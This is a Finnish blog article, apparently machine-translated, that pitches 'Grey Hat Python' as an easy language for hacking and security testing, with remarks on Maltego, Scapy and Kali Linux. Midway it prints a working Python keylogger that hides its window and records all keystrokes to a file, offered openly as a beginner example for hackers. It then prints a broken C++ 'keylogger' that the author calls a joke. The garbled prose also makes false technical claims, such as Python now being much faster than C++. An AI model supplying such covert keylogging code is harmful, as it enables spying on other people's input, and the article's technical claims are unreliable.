Grey Hat Python - Joten kaksi vuotta sitten tutkin ohjelmointikieliä, aloin lukea C-, C ++-, Assembly-, Python- ja Ruby-kirjoja. Halusin tulla asiantuntijaksi verkkoturvallisuudessa. Joten aloin oppia niin paljon kuin pystyn. Aloitin siitä, että C, C ++ ja C # olivat perustiedot, ja oppinutani ja koonnut paljon ohjelmia ja viruksia aloin vihdoin oppia Kali Linuxia. Niille, jotka eivät tiedä mitä Kali Linux on, se on käyttöjärjestelmä läpäisytestaukseen. Joten jatkoin opiskeluani ja näin, että suurin osa ohjelmista, viruksista ja troijalaisista oli koottu Pythoniin, ja niiden perusta oli Ruby.

Joten lopetin toistaiseksi opintoni ja aloin oppia Pythonia tai tarkemmin sanottuna Grey Hat Pythonia ja tadaaa… Se oli erittäin helppoa verrattuna C: hen, C #: ään tai mihinkään muuhun opittuun kieleen. Sain vihdoin tietää, miksi Python oli eniten käytetty kieli ja kuinka siitä tuli kuuluisa.
Joten tänään keskustelen siitä, kuinka Python muuttui Grey Hat Pythoniksi ja miksi sitä käytetään niin laajasti, että jopa Google ja YouTube käyttävät sitä tietokantaansa antaakseen mahdollisimman tarkkoja hakutuloksia.

Alkaen Python on korkean tason ohjelmointikieli, mikä tarkoittaa, että sen syntaksit ovat erittäin helppo lukea, jopa aloittelijoille. Jos olet uusi ohjelmointiohjelma, suosittelisin tätä kieltä. Annan teille esimerkin:

Näin se näyttää C: stä:

#include

int main()
(
printf("Hello world\n");
return 0;
)

Näin se näyttää Java:

class HelloWorld
(
public static void main (String args())
(
System.out.println ("Hello World");
)
)

Ja miltä se näyttää Pythonista (v2.7)

print "Hello World"

Yksinkertainen? Kyllä se on. Joten Python oli paitsi helppo kirjoittaa ja ymmärtää myös erittäin kompakti. Joten saatat ihmetellä, miten tämä johti Grey Hat Python -tuotteeseen?

Suositellut kurssit

  • IP-reitityskoulutus
  • Hakkerointikurssi
  • Täydellinen RMAN-koulutus
  • Python-ohjelmointikoulutus

Python vs Grey Hat Python

Joten mitä Grey Hat Python on? Miksi se eroaa niin tavallisesta Pythonistamme? Asia on Grey Hat Python ei ole muuta kuin hakkerit, Network-Stress -testaajat ja Reverse Engineers kirjoittaneet Python-ohjelmat ohjelman luomiseksi tai murtamiseksi. Mutta termiä Grey Hat käytetään, koska se ei ole tarkalleen hyödyllinen tai käyttäjän ohjelmisto. Sitä käytetään suojaamaan tai luomaan tietoturvaa rikkova ohjelmisto.

Sitä voidaan helposti käyttää joko turvallisen ympäristön rajoitusten testaamiseen tai murtautumiseen turvalliseen ympäristöön. Sitä harmaa hattu tarkoittaa. Ja se on paljon helpompaa tehdä se Pythonissa kuin tehdä se C, C ++ tai Java. Siksi nimi Harmaahattu Python. Muutamia esimerkkejä, joita voin ajatella, ovat:

• Avaintallentajien kirjoittaminen (hakkereille ja vihollisille)
• Suojauskuorikomentosarjojen kirjoittaminen (verkon järjestelmänvalvojille)
• Automaattisen IDS: n (tunkeutumisen havaitsemisjärjestelmän kirjoittaminen tietoturvainsinöörille) kirjoittaminen

Joten, nyt tiedät miksi ja kuinka Grey Hat Python on hyödyllinen. Tarkentaaksesi tätä, annan teille joitain yksityiskohtaisia ​​esimerkkejä.
Olet ehkä kuullut Google App Enginestä. Google App Engine suunniteltiin alun perin Pythonissa ennen sen siirtämistä. Google App on oikea esimerkki Python-ohjelmaan kirjoitetusta ohjelmasta, koska se mahdollistaa verkkosovellusten rakentamisen käyttämällä huippuluokan runsaasti kirjastojen, työkalujen ja puitteiden kokoelmaa.

Oletko koskaan miettinyt, miksi on niin helppoa etsiä jotain Googlessa? Suurimman osan ajasta saat hakutuloksia, jotka ovat 80% tarkkoja. Tämä johtuu siitä, että Python on erittäin joustava, toimii suurella nopeudella ja tietokannat ovat paljon kompaktimpia, vaikka se tallentaa n-määrän tietoja. Python on niin laajennettavissa, että jopa YouTube käyttää sitä esimerkiksi videoiden katseluun, mallien hallintaan, videon hallintaan, kanonisten tietojen käyttöyn ja moniin muihin tarkoituksiin.

Googlen indeksointirobotit ja hämähäkkejä keräävät tietoja heti, kun ne on ladattu verkkoon riippumatta siitä, missä tai kuinka suojattu se on. Tämän tiedon keräämiseen tarvitaan vain asianmukaista inspiraatiota, aikaa ja tietoa.

Google-haut perustuivat aiemmin Pythoniin, joka muutettiin myöhemmin C ++: ksi nopeuden optimoimiseksi, koska Google-indeksoijat indeksoivat useita sivuja sekunnissa ja jokaisella niistä vie indeksointi onnistuneesti muutaman minuutin. Python on tällä hetkellä paljon nopeampaa kuin C ++, mutta se ei ollut sama tapaus muutama vuosikymmen sitten.

Oli yksi kuuluisa lainaus, jonka Google lainasi: -
"Python missä voimme, C ++ missä meidän on."

Joten saatat miettiä, kuinka tätä voidaan käyttää hakkerointiin, Pentestingiin ja Verkkoturvaan. Olen eri mieltä. Jos voisit luoda ohjelman, joka on 70–80% tarkka antamalla tehokkaita hakutuloksia, voit todennäköisesti rakentaa sovelluksen, joka voi yhdistää verkkosivustoja, etsiä älykkäästi ja luoda profiilin henkilöstä, jota mieluummin voivat käyttää yksittäiset mustat hatut. haitallisiin tarkoituksiin. Jätä yksilöiden sivuun, jos yksi on tarpeeksi älykäs, voi helposti rakentaa sovelluksen yrityksen profiilin rakentamiseksi, sen koko puun juuresta mihin tahansa voit ajatella …

Tietojen kerääminen Maltegon kautta

Saatat ajatella, että liioin hieman. Ei, en ole!

Ajattele esimerkiksi Maltegoa. Maltego on ohjelmisto tai voin paremmin sanoa sen avoimen lähdekoodin oikeuslääketieteelliseksi sovellukseksi, joka on rakennettu tietojen keräämistä ja ihmisten, yritysten ja muiden yritysvirastojen profiilien rakentamista varten.

Joudutaan syöttämään sovellukseen oikeat tiedot, ja muut asiat, kuten sähköpostiviestien, ihmisten, ihmisryhmien linkittäminen, jopa Internet-infrastruktuurien määrittäminen, kuten verkkotunnukset, DNS-nimet, verkkotietot ja IP-osoitteet, voidaan yhdistää ja yhdistää toisiinsa tämän avoimen lähdekoodin tiedustelun avulla. .

Lisätietoja käymällä tietää mikä on Maltego?

Joten jos pääsy ”salaisiin tietoihin” määrää menestyksesi, Maltego voi auttaa sinua löytämään sen. Maltego on kirjoitettu osittain pythoniksi ja käyttää myös Javaa, joka on jälleen hieno kieli.

Niin paljon lainata Googlen tietoturvasta. Tarkemmin sanottuna Google on vähiten tapa, jolla voit pitää itsesi nimettömänä verkossa, sillä ei ole väliä, käytätkö chromista incognitoa vai www.duckduckgo.com. Koska viime kädessä kaikki päivitetään verkossa. Tärkeä asia tässä on, että kyse ei ole haavoittuvuudesta, kyse on ehdottomasta haavoittuvuudesta. Internetistä ei voi täysin tyhjentyä. Mutta voidaan varmasti yrittää pitää Internetissä mahdollisimman vähän tietoja.

Python ei ole vain kieli, se on myös skriptikieli. Skriptikielet antavat sinun kirjoittaa, muokata omia työkalujasi, kun tarvitset jotain mukautetumpaa. Nämä verkkoturvatyökalut ovat skriptikielen laajuuden kannalta riippuvaisia ​​suuresti. Otetaan esimerkiksi Scapy.

Scapy on kirjoitettu puhtaasti Pythoniksi. Se on tehokas interaktiivinen pakettien käsittelytyökalu. Se voi luoda vääriä paketteja omillaan, skannata verkkoja ja voi jopa haistaa paketteja verkossa.

Löydät yksityiskohtaiset tiedot aiheesta Mikä on Scapy?

Nyt nämä ovat monimutkaisia ​​ohjelmia, jotka ovat kirjoittaneet edistyneet ohjelmoijat. Katsotaan kuinka helppoa on kirjoittaa ohjelma Python-ohjelmaan, joka ymmärretään helposti ihmisille, joilla on hyviä ohjelmoinnin perusteita.

Tämä on Pythoniin kirjoitettu näppäimistö: -

#!/usr/bin/Python
import pyHook
import Pythoncom
import win32gui
import win32console
log_file = "log_file.txt" #name of log file
window = win32console. GetConsoleWindow() #go to script window
win32gui.ShowWindow (window, 0) #hide window
def pressed_chars(event): #on key pressed function
if event.Ascii:
f = open(log_file, "a") # (open log_file in append mode)
char = chr (event.Ascii) # (insert real char in variable)
if char == "q": # (if char is q)
f.close() # (close and save log file)
exit() # (exit program)
if event.Ascii == 13: # (if char is "return")
f.write("\n") # (new line)
f.write(char) # (write char)

proc = pyHook.HookManager() #open pyHook
proc.KeyDown = pressed_chars #set pressed_chars function on KeyDown event
proc.HookKeyboard() #start the function
Pythoncom.PumpMessages() #get input

Joten tämä on paljon enemmän kuin helppoa, jos kysyt minulta. Olen juuri lisännyt moduulit pyhook, Pythoncom, Win32gui ja Win32console, jotka voit ladata helposti Sourceforgen verkkosivustolta, ja mainitsin kommentit hash-tunnisteen avulla. Mutta jos minun on kirjoitettava sama ohjelma C ++: ssa, katsotaan kuinka vaikea se voi olla.

Tämä on C ++-kirjoitettu ohjelma: -

 #include #include #include #include int main(int argc, char ** agrv)( using namepace std; /*Easier*/ char std::vector input_STRUCT = ("S", "T", "O"); char std::vector input_STRUCT_1 = ("P", ""); char std::vector input_STRUCT_2 = ("L", "O", "O", "K", "I", "N", "G"); char std::vector input_STRUCT_3 = ("", "F", "O", "R"); char std::vector input_STRUCT_4 = ("M", "A", "L", "W"); char std::vector input_STRUCT_5 = ("A", "R", "E"); ostream os("C:\users\keylogger.txt"); int i; for( i = 0; i <=2; i++)( os << input_STRUCT(i); for(;i <= 1000000 ;i++)( ) ) for( i=0; i<=1;i++)( os << input_STRING_1(i); for(;i <= 1000000 ;i++)( ) ) for(i=0; i<=6; i++) ( os << input_STRING_2 (i); for(; i <= 1000000 ; i++)( ) for(i=0; i<=3;i++)( os << input_STRING_3(i); for(; i <= 1000000 ;i++)( ) ) for(i=0; i<=3; i++)( os << input_STRING_4(i); for(;i <= 1000000 ; i++)( ) ) for(i=0; i<=2; i++)( os << input_STRING_5(i); for(;i <= 1000000 ; i++)( ) ) os.close(); istream is (" C:\users\keylogger.txt "); cout << is; return 0; )

Joten, tämä on melko suuri verrattuna Pythoniin. Ja jos puhumme tehokkuudesta, Python voidaan helposti kääntää suoritettavaksi ilman mitään vaivaa py2exe-ohjelmiston avulla. Vaikka puhun C ++: sta, rehellisesti sanottuna, tämä koodi on vitsi. Oikean avainlokerin kirjoittamiseksi täytyy kirjoittaa DLL, joka toteuttaa WH_KEYBOARD-koukun. Lisäksi tämä koodi on kaukana siitä, että aloittelija on helppo ymmärtää sitä.

Avoimen lähdekoodin hakkerointi

Nyt tämä hoitaa Black Hat-hakkerit, tarkemmin sanottuna ihmiset, jotka aikovat tuhota, käsitellä tietoja omiin tarpeisiinsa. Turvallisuuteen liittyvistä näkökohdista katsottuna Python on hyödyllinen myös White Hat-hakkereille, jotka aikovat pelastaa yhteiskunnan haitallisten hakkereiden hyökkäyksiltä. Jos haluat kehittää uraa tai ainakin haluat oppia Pythonin tietoturvatutkimusta varten, voit varmasti perehtyä OWASP-, BRO- tai Quick NIX Secure Script -työkaluihin.

OWASP on Open Web Application Security Project. OWASP pyrkii luomaan turvallisemman Python-version, jonka avulla tietoturvaammattilaiset ja kehittäjät voivat kirjoittaa ohjelmistojen vähemmän alttiiksi hakkereiden hyökkäyksille. Se liittyy Black-Box -analyysiin, tunnistamaan ja käsittelemään tietoturvaan liittyviä kysymyksiä, jotka voivat vaikuttaa Pythonin interaktiiviseen tulkkiin.

BRO on verkkoturva- ja liikenteenvalvontaohjelma, kun taas Quick NIX -sovellusta käytetään kovettumaan ja turvaamaan tiedostojen omistajuudet lennossa.

Koska puhumme turvallisuudesta, puhutaanpa käyttöjärjestelmästä, joka perustuu osittain Pythoniin. Python toimii hyvin UNIX: n, LINUX: n ja Debianin kanssa. Yksi kuuluisimmista käyttöjärjestelmistä oli Backtrack 5. Oli olemassa erilaisia ​​versioita. Se on suunniteltu erityisesti PenTestingille. Myöhemmin loukkaavan turvallisuuden ihmiset ajattelivat, että Backtrack tarvitsee uudelleenkäynnistyksen, koska suurin osa työkaluista joko ei toiminut kunnolla tai niitä ei tuettu.

Myöhemmin he julkaisivat Kali Linuxin, joka perustui täysin Debianiin. Ja suurin osa sen kehyksestä on joko Ruby tai Python. Myös Ruby on mahtava skriptikieli. Haluaisin kuitenkin milloin tahansa pythonin yli, sillä syynä on, että Pythonilla on monimuotoisempi yhteisö Linuxin kanssa ja sen suorampi ja helppo virheenkorjaus. Vaikka Rubylla onkin paljon ominaisuuksia ja se mukautuu nopeasti ympäröivään ympäristöönsä, se voi olla vaikea korjata, lukea ja on hienostuneempaa kuin Python.

Paras esimerkki olisi Apple- ja Linux-vertailu tai iPhonen ja Androidin vertaaminen. Apple on runsaasti resursseja ja on erittäin tasainen, ja se on enemmän puolueellinen aloittelijoille. Linux / Android on käyttäjäystävällisempi, vähän viivästynyt ja voi olla päänsärky joskus, jos et tiedä kuinka määrittää tai ylläpitää sitä.

Siellä on jopa kirja, joka perustuu Justin Seitzin Python Grey Hat hakkerointiin. Se käsittelee erityisesti työläitä käänteistekniikoita ja tietoturvaan liittyviä tehtäviä, suunnittelee omat virheenkorjaimet, kirjasto- ja DLL-injektiot, suojaa liikenteen salatusta istunnosta ja käyttää Immunity-virheenkorjainta, Sulleya ja monia muita. Se on mahtava kirja, ei ole väliä oletko aloittelija vai asiantuntija, opit aina jonkun tai toisen asian joka kerta, kun luet sitä.

johtopäätös

Joten, jos olet aloittelija, Python olisi oikea valinta, jonka avulla voit aloittaa ensimmäisenä ohjelmointiturvallisuuden testauskielenä.

Muista vain yksi asia lopulta Grey Hat Python ei ole vain kieli, se on tapa tehdä asiat oikein ja nopeasti.

Ensimmäinen kuvan lähde: pixabay.com

Aiheeseen liittyvät artikkelit:-

Tässä on artikkeleita, jotka auttavat sinua saamaan lisätietoja Grey Hat Pythonista, joten mene vain linkin läpi.

  1. Tietoturvatyökalujen edut Sinun on oltava tietoinen
  2. Ura Pythonissa
  3. 25 suosituinta Python-haastattelua koskevaa kysymystä ja vastausta
  4. Mitkä ovat Pythonin käytön edut ja rajoitukset?
  5. Python vs Node.js
  6. Opas verkkoturvahaastattelua koskeviin kysymyksiin
  7. Erityyppiset työkalut turvallisuuden testaamiseen

Luokka:

Ohjelmistokehitys